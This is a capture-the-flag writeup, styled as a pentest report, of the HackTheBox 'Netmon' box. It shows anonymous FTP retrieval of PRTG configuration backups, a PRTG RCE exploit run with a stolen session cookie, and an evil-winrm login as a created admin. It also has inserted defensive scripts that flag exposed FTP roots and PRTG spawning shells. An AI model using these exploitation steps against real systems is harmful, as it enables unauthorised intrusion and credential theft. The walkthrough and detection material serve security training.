Netmon CTF Writeup

This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Netmon CTF from HackTheBox. The writeup takes the form of a pentest report.

Netmon CTF

Netmon is an easy difficulty Windows box with simple enumeration and exploitation. PRTG is running, and an FTP server with anonymous access allows reading of PRTG Network Monitor configuration files. The version of PRTG is vulnerable to RCE which can be exploited to gain a SYSTEM shell.

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Independent Challenge - 10.10.10.152

export IP=10.10.10.152

Service Enumeration

IP Address      Ports Open
10.10.10.152    TCP: 21, 80, 135, 139, 445, 5985, 47001

Command: nmap -sC -sV -T4 -vv -p- 10.10.10.152

FTP Enumeration (port 21)

Unauthorized Access and Information Disclosure

Vulnerability Explanation: Behind Security noted the presence of a significant vulnerability in the FTP server running on 10.10.10.152. The FTP server had anonymous login enabled, allowing unauthenticated access to the file system. Furthermore, the FTP server was configured with the machine's root directory (C:) as its storage location, granting direct access to the entire file system. Exploiting this misconfiguration allowed Behind Security to read sensitive configuration files belonging to the PRTG Network Monitor instance hosted on port 80.

Vulnerability Fix:

  • Disable anonymous login on the FTP server to prevent unauthorized access;
  • Configure the FTP server to serve a dedicated directory, so that nothing outside it is reachable from the FTP root.

Severity: High

Steps to Reproduce the Finding: Log in via FTP as "anonymous" with ftp anonymous@10.10.10.152 and specify no password (press Enter when prompted).

Getting sensitive configuration file:

ftp> cd programdata
250 CWD command successful.
ftp> pwd
Remote directory: /programdata
ftp> ls 
229 Entering Extended Passive Mode (|||51713|)
150 Opening ASCII mode data connection.
12-15-21  10:40AM       <DIR>          Corefig
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  12:15AM       <DIR>          TEMP
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls 
229 Entering Extended Passive Mode (|||51716|)
150 Opening ASCII mode data connection.
08-10-23  03:15PM       <DIR>          PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> dir 
229 Entering Extended Passive Mode (|||51717|)
150 Opening ASCII mode data connection.
08-10-23  01:51PM       <DIR>          Configuration Auto-Backups
08-10-23  01:10PM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
08-10-23  01:10PM       <DIR>          Logs (Web Server)
08-10-23  01:15PM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
08-10-23  03:15PM              1723410 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||51726|)
150 Opening ASCII mode data connection.
100% |************************************************|  1126 KiB  879.01 KiB/s    00:00 ETA
226 Transfer complete.
1153755 bytes received in 00:01 (878.95 KiB/s)
ftp> exit

REDACTED prtgadmin password
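The two conditions reported above (an FTP root that is the whole system drive, and PRTG configuration backups readable over that share) can be checked mechanically from a plain directory listing. The following Python script is an added example and is not part of the Behind Security writeup or of any PRTG/FTP tooling: it parses the MS-DOS style listing lines a Windows FTP server returns for ls/dir, flags root entries that betray a system-drive root, and flags the PRTG configuration files. The root listing in SAMPLE_LISTINGS is constructed for the example; the PRTG directory lines are the ones shown in the session above. The set of system-drive marker names is an assumption based on the standard Windows layout.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Regex for the MS-DOS style listing lines a Windows FTP server returns, e.g.
# "02-03-19  12:18AM       <DIR>          Paessler" or
# "02-25-19  10:54PM              1189697 PRTG Configuration.dat".
_LISTING_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{1,2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)

# Directory names that, if present at the FTP root, mean the root is the whole
# system drive rather than a dedicated share (assumed standard Windows layout).
SYSTEM_DRIVE_MARKERS = {"windows", "program files", "program files (x86)", "programdata", "users"}

# PRTG configuration files: they embed credentials, so their exposure is a finding.
SENSITIVE_FILE_RE = re.compile(r"^PRTG Configuration\.(dat|old|old\.bak)$", re.IGNORECASE)


@dataclass
class Entry:
    name: str
    is_dir: bool
    size: int


def parse_listing(lines: List[str]) -> List[Entry]:
    """Turn raw ftp client output into entries; FTP status lines (226, 229, ...) are skipped."""
    entries = []
    for line in lines:
        m = _LISTING_RE.match(line)
        if m:
            entries.append(Entry(m["name"], m["dir"] is not None, int(m["size"] or 0)))
    return entries


def audit_listings(listings: Dict[str, List[str]]) -> List[str]:
    """Apply both checks to a mapping of remote path -> raw listing lines."""
    findings = []
    for path, lines in listings.items():
        entries = parse_listing(lines)
        if path == "/":
            markers = {e.name.lower() for e in entries if e.is_dir} & SYSTEM_DRIVE_MARKERS
            if markers:
                findings.append(f"FTP root is the system drive (saw {sorted(markers)})")
        for e in entries:
            if not e.is_dir and SENSITIVE_FILE_RE.match(e.name):
                findings.append(f"sensitive file exposed: {path}{e.name} ({e.size} bytes)")
    return findings


# Constructed sample: a made-up root listing plus the PRTG directory as shown in the writeup.
SAMPLE_LISTINGS = {
    "/": [
        "229 Entering Extended Passive Mode (|||51700|)",
        "150 Opening ASCII mode data connection.",
        "11-20-16  10:19PM       <DIR>          inetpub",
        "02-03-19  12:18AM       <DIR>          Program Files",
        "02-03-19  12:18AM       <DIR>          Program Files (x86)",
        "12-15-21  10:40AM       <DIR>          ProgramData",
        "11-20-16  10:36PM       <DIR>          Users",
        "11-20-16  10:36PM       <DIR>          Windows",
        "226 Transfer complete.",
    ],
    "/programdata/Paessler/PRTG Network Monitor/": [
        "08-10-23  01:51PM       <DIR>          Configuration Auto-Backups",
        "02-25-19  10:54PM              1189697 PRTG Configuration.dat",
        "02-25-19  10:54PM              1189697 PRTG Configuration.old",
        "07-14-18  03:13AM              1153755 PRTG Configuration.old.bak",
        "08-10-23  03:15PM              1723410 PRTG Graph Data Cache.dat",
        "02-25-19  11:00PM       <DIR>          Report PDFs",
    ],
}

if __name__ == "__main__":
    for finding in audit_listings(SAMPLE_LISTINGS):
        print(finding)
```

Fed the real output of ls from your own server, the script reports one line for the system-drive root and one per exposed configuration file; an FTP root that is a dedicated directory produces no marker finding at all.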

Web Server Enumeration (port 80)

Initial Access - Outdated Software RCE

Vulnerability Explanation: The nmap scan revealed the exact version of PRTG Network Monitor: 18.1.37.13946. There is a known Remote Code Execution (RCE) vulnerability for this software version, and a public exploit is available. Successful exploitation creates a new user on the target system with administrative privileges, posing a severe security risk.

Vulnerability Fix: Update PRTG Network Monitor to the latest version, as the vendor has already issued a patch for this known vulnerability.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Download the exploit here
  2. Use the previously found credentials (replacing "2018" with "2019", as the recovered password comes from an old backup) to log in to the PRTG Network Monitor instance
  3. Copy the name and the value of the OCTOPUS session cookie
  4. Use the session cookie to execute the exploit: ./46527.sh -u http://10.10.10.152 -c "OCTOPUS1813713946=ezJENjZEOEIwLUEwODEtNDZBQi04NzQwLTY0QkVBNzM2RkQ1MH0%3D"
  5. Use the evil-winrm tool with the credentials pentest:P3nT3st!. The command used was: evil-winrm -u pentest -p 'P3nT3st!' -i 10.10.10.152

Screenshots:

  1. PRTG Network Monitor successful login as admin
  2. Getting the session cookie
  3. Using the cookie to execute the exploit
  4. Using evil-winrm to log in as "pentest", with SYSTEM privileges

Proof of Exploitation: REDACTED user.txt and root.txt
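From the defender's side, the observable side effect described in this finding is that the PRTG core service (running as SYSTEM) ends up creating a local account and adding it to Administrators. The following Python script is an added example, not part of the writeup or of PRTG: it runs two detection rules over flattened Windows Security events, (a) account-created events (4720) whose subject is SYSTEM or that are followed within a short window by membership in Administrators (4732), and (b) process-creation events (4688) where the PRTG core process is the parent of a shell or account-management binary. The event records in SAMPLE_EVENTS are constructed, and the image name "PRTG Server.exe" is an assumption to be adjusted to what your hosts actually log.

```python
import ntpath
from datetime import datetime, timedelta
from typing import Dict, List

# Child images a monitoring server's core process has no business launching.
SHELL_IMAGES = {"powershell.exe", "cmd.exe", "net.exe", "net1.exe"}
# Assumed image name of the PRTG core service; adjust to what your hosts log.
PRTG_CORE_IMAGE = "prtg server.exe"


def _ts(ev: Dict) -> datetime:
    return datetime.fromisoformat(ev["time"])


def suspicious_account_events(events: List[Dict], window: timedelta = timedelta(minutes=5)) -> List[str]:
    """Flag 4720 (account created) events that look like exploit side effects: the
    creator is SYSTEM, or the account lands in Administrators (4732) within `window`."""
    promotions = [e for e in events
                  if e["id"] == 4732 and e.get("group", "").lower() == "administrators"]
    findings = []
    for ev in events:
        if ev["id"] != 4720:
            continue
        reasons = []
        if ev["subject"].upper().endswith("\\SYSTEM"):
            reasons.append("created by the SYSTEM account")
        for p in promotions:
            delta = _ts(p) - _ts(ev)
            if p["target"] == ev["target"] and timedelta(0) <= delta <= window:
                reasons.append(f"added to Administrators {int(delta.total_seconds())}s later")
        if reasons:
            findings.append(f"account '{ev['target']}': " + "; ".join(reasons))
    return findings


def monitor_spawned_shells(events: List[Dict]) -> List[str]:
    """Flag 4688 (process creation) events where the PRTG core process is the parent
    of a shell or account-management binary."""
    findings = []
    for ev in events:
        if ev["id"] != 4688:
            continue
        parent = ntpath.basename(ev["parent"]).lower()
        child = ntpath.basename(ev["process"]).lower()
        if parent == PRTG_CORE_IMAGE and child in SHELL_IMAGES:
            findings.append(f"{parent} spawned {child} at {ev['time']}")
    return findings


# Constructed sample events (flattened Security-log fields; every value is made up).
SAMPLE_EVENTS = [
    {"time": "2019-02-25T22:50:00", "id": 4688, "subject": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Server.exe",
     "process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"time": "2019-02-25T22:50:01", "id": 4688, "subject": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "process": "C:\\Windows\\System32\\net.exe"},
    {"time": "2019-02-25T22:50:02", "id": 4720, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "pentest"},
    {"time": "2019-02-25T22:50:03", "id": 4732, "subject": "NT AUTHORITY\\SYSTEM",
     "target": "pentest", "group": "Administrators"},
    # Benign account creation by a human admin hours later, for contrast.
    {"time": "2019-02-26T09:00:00", "id": 4720, "subject": "NETMON\\Administrator",
     "target": "svc_backup"},
]

if __name__ == "__main__":
    for finding in suspicious_account_events(SAMPLE_EVENTS) + monitor_spawned_shells(SAMPLE_EVENTS):
        print(finding)
```

On the sample data the account rule reports only "pentest" (created by SYSTEM and promoted one second later) and ignores the administrator-created service account, while the process rule reports the single powershell.exe launched directly by the PRTG core process; the net.exe launched from that PowerShell is not flagged because only one level of ancestry is checked, which is the obvious extension if your logging records a full process tree.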

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 
